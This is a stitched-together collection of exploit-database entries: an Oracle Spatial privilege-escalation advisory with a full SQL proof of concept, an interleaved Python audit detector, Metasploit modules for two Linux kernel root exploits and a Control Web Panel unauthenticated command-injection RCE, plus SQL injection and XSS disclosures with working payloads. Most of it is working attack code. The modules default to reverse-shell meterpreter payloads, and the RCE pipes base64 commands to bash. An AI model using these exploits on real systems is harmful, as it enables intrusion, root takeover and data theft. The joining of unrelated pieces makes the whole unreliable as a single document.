<pre><code>Title: Oracle Database Privilege Escalation Through Oracle Spatial Component
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2
Tested Version(s): 12cR1
Risk Level: High
Solution Status: Fixed in Oracle Critical Patch Update October 2021
CVE Reference: N/A, Backported in Oracle CPU OCT 2021
Author of Advisory: Emad Al-Mousa

Overview:

Privilege escalation is a well-known class of security vulnerability (and exploitation technique): attackers seek to compromise IT systems for objectives such as data exfiltration or causing an outage.


*****************************************
Vulnerability Details:

The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to the "DBA" role. The DBA role in Oracle is a very powerful role: the user can view and edit any data within the database, create database objects (tables, malicious code, etc.) and perform many other harmful activities. The vulnerability exists only if the Oracle "Spatial" component is installed in the database system.
This vulnerability existed in Oracle 12cR1 and a backport fix was issued in October 2021.

To check whether the Oracle Spatial component is installed, run the following SQL query; it lists ALL installed components within the database system:

SQL> select comp_name from dba_registry;


*****************************************
Proof of Concept (PoC):

// I will create an account called ironman using the SYS account; the account will be granted "create session" to connect to the database, and "create any procedure" and "execute any procedure" permissions:

sqlplus / as sysdba

SQL> create user ironman identified by iron_123;

SQL> grant create session to ironman;

SQL> grant create any procedure to ironman;

SQL> grant execute any procedure to ironman;

SQL> exit;

// I will now connect using the newly created account "ironman" using SQL*Plus

sqlplus ironman/iron_123

SQL> show user

USER is "IRONMAN"

SQL> select * from session_roles;

no rows selected

SQL> create or replace procedure SPATIAL_CSW_ADMIN_USR.hulk (SQL_TEXT IN VARCHAR2) as
  BEGIN
    EXECUTE IMMEDIATE (SQL_TEXT);
  END hulk;
/

SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');

SQL> select * from session_roles;

no rows selected

SQL> set role DATAPUMP_IMP_FULL_DATABASE;

// the ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE

SQL> select * from session_roles;

ROLE
——————————————————————————–
DATAPUMP_IMP_FULL_DATABASE
EXP_FULL_DATABASE
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
HS_ADMIN_ROLE
HS_ADMIN_EXECUTE_ROLE
EXECUTE_CATALOG_ROLE
IMP_FULL_DATABASE

8 rows selected.

// the next escalation level is to the DBA role !!

SQL> grant dba to ironman;

SQL> set role dba;

SQL> select * from session_roles;

ROLE
——————————————————————————–
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
HS_ADMIN_ROLE
HS_ADMIN_EXECUTE_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE

ROLE
——————————————————————————–
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
XDBADMIN
XDB_SET_INVOKER
JAVA_ADMIN
JAVA_DEPLOY
WM_ADMIN_ROLE
CAPTURE_ADMIN
OPTIMIZER_PROCESSING_RATE
EM_EXPRESS_ALL
EM_EXPRESS_BASIC

22 rows selected.

--- Conclusion:

The account ironman has been successfully elevated to the "DBA" role, which is the highest database role in the Oracle database system.


*****************************************
- Defensive Techniques:

configure auditing to catch any privilege escalation attempts.
review database account permissions on a regular basis.
ensure database accounts have strong passwords, and rotate passwords regularly if possible.
perform VA (vulnerability assessment) scans on a regular basis.
proactively patch your systems and database systems.


*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/

Credit:
Security-In-Depth Contributors: Emad Al-Mousa

</code></pre>
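As an added, defender-side illustration of the first two Defensive Techniques above (auditing and permission review), the following Python is not part of the advisory. It runs over constructed rows modelled on the DBA_AUDIT_TRAIL columns USERNAME, ACTION_NAME, OWNER, OBJ_NAME and GRANTEE, and over constructed DBA_SYS_PRIVS rows, and flags the chain the PoC produces: a procedure created in the Spatial schema by another user, followed by a powerful role being granted to the very user issuing the GRANT. The COMPONENT_SCHEMAS set (beyond SPATIAL_CSW_ADMIN_USR), the admin allowlist and all sample rows are assumptions made for this example.

```python
from dataclasses import dataclass

# Roles the PoC grants itself, plus the DBA umbrella role at the end of the chain.
POWERFUL_ROLES = {"DBA", "DATAPUMP_IMP_FULL_DATABASE", "DATAPUMP_EXP_FULL_DATABASE",
                  "IMP_FULL_DATABASE", "EXP_FULL_DATABASE"}
# Component-owned schemas in which no human account should be creating code.
# SPATIAL_CSW_ADMIN_USR is the schema abused in the PoC; MDSYS is an assumed
# addition. Build the real set from DBA_REGISTRY / DBA_USERS on your system.
COMPONENT_SCHEMAS = {"SPATIAL_CSW_ADMIN_USR", "MDSYS"}
ADMIN_ACCOUNTS = frozenset({"SYS", "SYSTEM"})  # assumed allowlist of administrators


@dataclass
class AuditRecord:
    """The DBA_AUDIT_TRAIL columns this check needs (rows below are constructed)."""
    username: str     # session user that issued the statement
    action_name: str  # 'CREATE PROCEDURE', 'EXECUTE PROCEDURE', 'GRANT ROLE', 'SET ROLE', ...
    owner: str        # schema of the object acted on, '' when not applicable
    obj_name: str     # object name, or the role name for GRANT ROLE / SET ROLE
    grantee: str      # for GRANT ROLE: who received the role, '' otherwise


def find_escalation(records):
    """Walk audit rows in time order and return (kind, user, detail) alerts.

    Two signals, and their combination, cover the advisory's PoC:
      * a user creating a procedure inside a component schema it does not own
        (needs CREATE ANY PROCEDURE; the procedure then runs with that schema's
        privileges), and
      * a powerful role being granted to the very user issuing the GRANT.
    """
    alerts = []
    foreign_proc_creators = set()
    for r in records:
        if (r.action_name == "CREATE PROCEDURE" and r.owner in COMPONENT_SCHEMAS
                and r.username != r.owner):
            foreign_proc_creators.add(r.username)
            alerts.append(("FOREIGN_SCHEMA_PROCEDURE", r.username,
                           f"{r.owner}.{r.obj_name}"))
        elif r.action_name == "GRANT ROLE" and r.obj_name in POWERFUL_ROLES:
            if r.grantee == r.username:
                kind = ("SELF_GRANT_AFTER_FOREIGN_PROCEDURE"
                        if r.username in foreign_proc_creators
                        else "SELF_GRANT_POWERFUL_ROLE")
            elif r.username not in ADMIN_ACCOUNTS:
                kind = "POWERFUL_ROLE_GRANT_BY_NON_ADMIN"
            else:
                continue  # an administrator granting a role: routine, not an alert
            alerts.append((kind, r.username, f"{r.obj_name} -> {r.grantee}"))
    return alerts


def risky_procedure_grantees(sys_privs, allowlist=ADMIN_ACCOUNTS):
    """sys_privs: (GRANTEE, PRIVILEGE) pairs as in DBA_SYS_PRIVS. Return the
    non-allowlisted grantees holding CREATE ANY PROCEDURE (the prerequisite the
    PoC relies on), noting when EXECUTE ANY PROCEDURE is held as well."""
    by_user = {}
    for grantee, priv in sys_privs:
        by_user.setdefault(grantee, set()).add(priv)
    risky = {}
    for grantee, privs in by_user.items():
        if grantee in allowlist or "CREATE ANY PROCEDURE" not in privs:
            continue
        risky[grantee] = "CREATE ANY PROCEDURE" + (
            " + EXECUTE ANY PROCEDURE" if "EXECUTE ANY PROCEDURE" in privs else "")
    return risky


# Constructed audit rows mirroring the PoC sequence, with benign rows mixed in.
SAMPLE_AUDIT = [
    AuditRecord("SYS", "CREATE PROCEDURE", "HR", "PAYROLL_CALC", ""),
    AuditRecord("IRONMAN", "CREATE PROCEDURE", "SPATIAL_CSW_ADMIN_USR", "HULK", ""),
    AuditRecord("IRONMAN", "EXECUTE PROCEDURE", "SPATIAL_CSW_ADMIN_USR", "HULK", ""),
    AuditRecord("IRONMAN", "GRANT ROLE", "", "DATAPUMP_IMP_FULL_DATABASE", "IRONMAN"),
    AuditRecord("IRONMAN", "SET ROLE", "", "DATAPUMP_IMP_FULL_DATABASE", ""),
    AuditRecord("SYS", "GRANT ROLE", "", "CONNECT", "BOB"),
    AuditRecord("IRONMAN", "GRANT ROLE", "", "DBA", "IRONMAN"),
]

# Constructed DBA_SYS_PRIVS rows for the permission review.
SAMPLE_SYS_PRIVS = [
    ("IRONMAN", "CREATE SESSION"), ("IRONMAN", "CREATE ANY PROCEDURE"),
    ("IRONMAN", "EXECUTE ANY PROCEDURE"), ("APP_RO", "CREATE SESSION"),
    ("DEPLOY", "CREATE ANY PROCEDURE"), ("SYS", "CREATE ANY PROCEDURE"),
]

if __name__ == "__main__":
    for alert in find_escalation(SAMPLE_AUDIT):
        print(alert)
    for grantee, privs in risky_procedure_grantees(SAMPLE_SYS_PRIVS).items():
        print(f"review {grantee}: {privs}")
```

The same logic applies to UNIFIED_AUDIT_TRAIL rows once the column names (DBUSERNAME, OBJECT_SCHEMA, OBJECT_NAME) are mapped onto the dataclass fields.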
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking # https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::Linux::Compile
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'io_uring Same Type Object Reuse Priv Esc',
        'Description' => %q{
          This module exploits a bug in io_uring leading to an additional put_cred()
          that can be exploited to hijack credentials of other processes.

          We spawn SUID programs to get the free'd cred object reallocated by a
          privileged process and abuse them to create a SUID root binary ourselves
          that'll pop a shell.

          The dangling cred pointer will, however, lead to a kernel panic as soon as
          the task terminates and its credentials are destroyed. We therefore detach
          from the controlling terminal, block all signals and rest in silence until
          the system shuts down and we get killed hard, just to cry in vain, seeing
          the kernel collapse.

          The bug affected kernels from v5.12-rc3 to v5.14-rc7.

          More than 1 CPU is required for exploitation.

          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Ryota Shiga', # discovery
          'Mathias Krause' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],
          [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],
          [ 'URL', 'https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14' ],
          [ 'CVE', '2022-1043' ]
        ],
        'DisclosureDate' => '2022-03-22',
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
          'PrependFork' => true
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Simplify pulling the writable directory variable
  def base_dir
    datastore['WritableDir'].to_s
  end

  def check
    # Check the kernel version to see if it's in a vulnerable range
    release = kernel_release
    if Rex::Version.new(release.split('-').first) > Rex::Version.new('5.14-rc7') ||
       Rex::Version.new(release.split('-').first) < Rex::Version.new('5.12-rc3')
      vprint_error "Kernel version #{release} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Kernel version #{release} appears to be vulnerable"

    # make sure we have enough CPUs. Minimum 2 required
    cpu = get_cpu_info
    if cpu[:cores] < 2
      # return explicitly; without it the Safe result was discarded and the
      # method fell through to Vulnerable
      return CheckCode::Safe("> 1 CPU required, detected: #{cpu[:cores]}")
    end
    CheckCode::Vulnerable("> 1 CPU required, detected: #{cpu[:cores]}")
  end

  def exploit
    # Check if we're already root
    if is_root? && !datastore['ForceExploit']
      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
    end

    # Make sure we can write our exploit and payload to the local system
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
    executable_name = ".#{rand_text_alphanumeric(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      code = strip_comments(exploit_source('CVE-2022-1043', 'cve-2022-1043.c'))
      upload_and_compile executable_path, code
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx executable_path, exploit_data('CVE-2022-1043', 'pre_compiled')
    end

    # Upload payload executable
    upload_and_chmodx payload_path, generate_payload_exe
    register_files_for_cleanup(payload_path)
    register_files_for_cleanup(executable_path)

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::Linux::Compile
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'vmwgfx Driver File Descriptor Handling Priv Esc',
        'Description' => %q{
          If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to
          recover by deallocating the (already populated) file descriptor. This is
          wrong, as the fd gets released via put_unused_fd() which shouldn't be used,
          as the fd table slot was already populated via the previous call to
          fd_install(). This leaves userland with a valid fd table entry pointing to
          a free'd 'file' object.

          We use this bug to overwrite a SUID binary with our payload and gain root.
          Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.

          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Mathias Krause' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],
          [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],
          [ 'CVE', '2022-22942' ]
        ],
        'DisclosureDate' => '2022-01-28',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
          'PrependFork' => true
        },
        'Notes' => {
          'Stability' => [CRASH_OS_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          # seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def check
    # Check the kernel version to see if it's in a vulnerable range
    release = kernel_release
    unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&
           Rex::Version.new(release) < Rex::Version.new('5.17-rc1')
      return CheckCode::Safe("Kernel version #{release} is not vulnerable")
    end

    vprint_good "Kernel version #{release} appears to be vulnerable"

    @driver = nil

    if writable?('/dev/dri/card0') # ubuntu, RHEL
      @driver = '/dev/dri/card0'
    elsif writable?('/dev/dri/renderD128') # debian
      @driver = '/dev/dri/renderD128'
    else
      return CheckCode::Safe('Unable to write to /dev/dri/card0 or /dev/dri/renderD128')
    end
    vprint_good("#{@driver} found writable")

    @suid_target = nil
    if setuid?('/bin/chfn') # ubuntu
      @suid_target = '/bin/chfn'
    elsif writable?('/bin/chage') # RHEL/Centos
      @suid_target = '/bin/chage'
    else
      return CheckCode::Safe('/bin/chfn isn\'t SUID or /bin/chage not writable')
    end
    vprint_good("#{@suid_target} suid binary found")

    if kernel_modules&.include?('vmwgfx')
      return CheckCode::Appears('vmwgfx installed')
    end

    CheckCode::Safe('Vulnerable driver (vmwgfx) not found')
  end

  def exploit
    # Check if we're already root
    if is_root? && !datastore['ForceExploit']
      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
    end

    # Make sure we can write our exploit and payload to the local system
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # backup the suid binary before we overwrite it
    @suid_backup = read_file(@suid_target)
    path = store_loot(
      @suid_target,
      'application/octet-stream',
      rhost,
      @suid_backup,
      @suid_target
    )
    print_good("Original #{@suid_target} backed up to #{path}")
    executable_name = ".#{rand_text_alphanumeric(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

      c_code = exploit_source('CVE-2022-22942', 'cve-2022-22942-dc.c')
      c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called
      c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target
      c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload

      upload_and_compile executable_path, strip_comments(c_code)
    else
      unless @suid_target == '/bin/chfn'
        fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')
      end
      vprint_status 'Dropping pre-compiled exploit on system...'
      payload_path = '/tmp/.aYd3GAMlK'
      upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled')
    end
    # register the dropped exploit for cleanup on both code paths
    register_files_for_cleanup(executable_path)

    # Upload payload executable
    print_status("Uploading payload to #{payload_path}")
    upload_and_chmodx payload_path, generate_payload_exe
    # register the payload's path (not its bytes) so FileDropper can remove it
    register_files_for_cleanup(payload_path)

    print_status 'Launching exploit...'
    output = cmd_exec executable_path, nil, 30
    output.each_line { |line| vprint_status line.chomp }
  end

  def cleanup
    if @suid_backup.nil?
      print_bad("MANUAL replacement of trojaned #{@suid_target} is required.")
    else
      print_status("Replacing trojaned #{@suid_target} with original")
      write_file(@suid_target, @suid_backup)
    end
    super
  end
end
</code></pre>
<pre><code>┌───────────────────────────────────────────────────────────────────────────────────────┐
   C r a C k E r
   T H E   C R A C K   O F   E T E R N A L   M I G H T
└───────────────────────────────────────────────────────────────────────────────────────┘

   ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌───────────────────────────────────────────────────────────────────────────────────────┐
   [ Vulnerability ]
└───────────────────────────────────────────────────────────────────────────────────────┘
   Author   : CraCkEr
   Website  : mybizcms.com
   Vendor   : MyBizCMS
   Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7
   Vuln Type: SQL Injection
   Impact   : Database Access

   Release Notes:
   ═════════════

   SQL injection attacks can allow unauthorized access to sensitive data, modification of
   data, and crashing of the application or making it unavailable, leading to lost revenue
   and damage to a company's reputation.
└───────────────────────────────────────────────────────────────────────────────────────┘

Greets:

   The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

   CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌───────────────────────────────────────────────────────────────────────────────────────┐
   © CraCkEr 2023
└───────────────────────────────────────────────────────────────────────────────────────┘

Path: /categories/phones

/categories/phones?min_price=2485[SQLI]&max_price=145000[SQLI]&brand[]=16&review_ratings=5&a4tech-brand[]=50[SQLI]&battery[]=44[SQLI]&storage[]=41[SQLI]&display[]=37[SQLI]&performance[]=36[SQLI]&attribute3[]=7[SQLI]


GET parameter 'min_price' is vulnerable to SQLI

GET parameter 'max_price' is vulnerable to SQLI

GET parameter 'a4tech-brand[]' is vulnerable to SQLI

GET parameter 'battery[]' is vulnerable to SQLI

GET parameter 'display[]' is vulnerable to SQLI

GET parameter 'performance[]' is vulnerable to SQLI

GET parameter 'attribute3[]' is vulnerable to SQLI


[-] Done
</code></pre>
<pre><code>┌───────────────────────────────────────────────────────────────────────────────────────┐
   C r a C k E r
   T H E   C R A C K   O F   E T E R N A L   M I G H T
└───────────────────────────────────────────────────────────────────────────────────────┘

   ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌───────────────────────────────────────────────────────────────────────────────────────┐
   [ Vulnerability ]
└───────────────────────────────────────────────────────────────────────────────────────┘
   Author   : CraCkEr
   Website  : mybizcms.com
   Vendor   : MyBizCMS
   Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7
   Vuln Type: Reflected XSS
   Impact   : Manipulate the content of the site

   Release Notes:
   ═════════════

   The attacker can send the victim a link containing a malicious URL in an email or
   instant message; the injected script can then perform a wide variety of actions, such
   as stealing the victim's session token or login credentials.
└───────────────────────────────────────────────────────────────────────────────────────┘

Greets:

   The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

   CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌───────────────────────────────────────────────────────────────────────────────────────┐
   © CraCkEr 2023
└───────────────────────────────────────────────────────────────────────────────────────┘

Path: /search

GET parameter 'pg' is vulnerable to XSS

/search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsg


Path: /categories/phones

GET parameter 'max_price' is vulnerable to XSS

/categories/phones?min_price=2485&max_price=fulkc"><script>alert(1)</script>hpbwm


Path: /categories/phones

GET parameter 'min_price' is vulnerable to XSS

/categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag


[-] Done
</code></pre>
<pre><code># Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)
# Date: 2023-01-02
# Exploit Author: Muhammad Navaid Zafar Ansari
# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip
# Version: 1.0
# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)
# CVE: Not Assigned Yet
# References: -

------------------------------------------------------------------------------------

1. Description:
----------------------

Online Eyewear Shop 1.0 allows unauthenticated SQL injection via the 'id' parameter in 'oews/?p=products/view_product&id=?'. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


2. Proof of Concept:
----------------------

Step 1 - Visit the URL http://localhost/oews/?p=products/view_product&id=5 and append a single quote to the id value to verify the SQL injection.
Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql

SQLMap Response:

[*] starting @ 04:49:58 /2023-02-01/

[04:49:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK
---
[04:50:00] [INFO] testing MySQL
[04:50:00] [INFO] confirming MySQL
[04:50:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.55, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)


3. Example payload:
----------------------

(boolean-based)

' AND 1=1 AND 'test'='test


4. Burpsuite request:
----------------------

GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip
Connection: close
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CWP login.php Unauthenticated RCE',
        'Description' => %q{
          Control Web Panel versions < 0.9.8.1147 are vulnerable to
          unauthenticated OS command injection. Successful exploitation results
          in code execution as the root user. The results of the command are not
          contained within the HTTP response and the request will block while
          the command is running.
        },
        'Author' => [
          'Spencer McIntyre', # metasploit module
          'Numan Türle' # vulnerability discovery
        ],
        'References' => [
          [ 'CVE', '2022-44877' ],
          [ 'URL', 'https://github.com/numanturle/CVE-2022-44877' ],
          [ 'URL', 'https://control-webpanel.com/changelog#1674073133745-84af1b53-c121' ]
        ],
        'DisclosureDate' => '2023-01-05',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(2031),
      OptString.new('TARGETURI', [true, 'Base path', '/login/index.php'])
    ])
  end

  def check
    sleep_time = rand(5..10)

    _, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end

    vprint_status("Elapsed time: #{elapsed_time} seconds")

    unless elapsed_time > sleep_time
      return CheckCode::Safe('Failed to test command injection.')
    end

    CheckCode::Appears('Successfully tested command injection.')
  rescue Msf::Exploit::Failed
    return CheckCode::Safe('Failed to test command injection.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      if execute_command(payload.encoded)
        print_good("Successfully executed command: #{payload.encoded}")
      end
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path) + "?login=$(echo${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash)",
      'vars_post' => {
        'username' => 'root', # *must* be root
        'password' => rand_text_alphanumeric(4..16),
        'commit' => 'Login'
      }
    )

    # the command will either cause the response to timeout or return a 302;
    # both count as success, so return a truthy value for the caller in #exploit
    return true if res.nil?
    return true if res.code == 302 && res.headers['Location'].include?('login=failed')

    fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")
  end
end
</code></pre>
<pre><code>┌───────────────────────────────────────────────────────────────────────────────────────┐
   C r a C k E r
   T H E   C R A C K   O F   E T E R N A L   M I G H T
└───────────────────────────────────────────────────────────────────────────────────────┘

   ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌───────────────────────────────────────────────────────────────────────────────────────┐
   [ Vulnerability ]
└───────────────────────────────────────────────────────────────────────────────────────┘
   Author   : CraCkEr
   Website  : PHPJabbers.com
   Vendor   : PHPJabbers
   Software : PHPJabbers Business Directory Script 3.2
   Vuln Type: Reflected XSS
   Impact   : Manipulate the content of the site

   Release Notes:
   ═════════════

   The attacker can send the victim a link containing a malicious URL in an email or
   instant message; the injected script can then perform a wide variety of actions, such
   as stealing the victim's session token or login credentials.
└───────────────────────────────────────────────────────────────────────────────────────┘

Greets:

   The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

   CryptoJob (Twitter) twitter.com/CryptozJob

┌───────────────────────────────────────────────────────────────────────────────────────┐
   © CraCkEr 2023
└───────────────────────────────────────────────────────────────────────────────────────┘

Path: /preview.php/

URL parameter vulnerable to XSS

/preview.php/[XSS]?controller=pjListings&action=pjActionAccount

GET parameter 'keyword' vulnerable to XSS

/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&keyword=[XSS]


[-] Done
</code></pre>
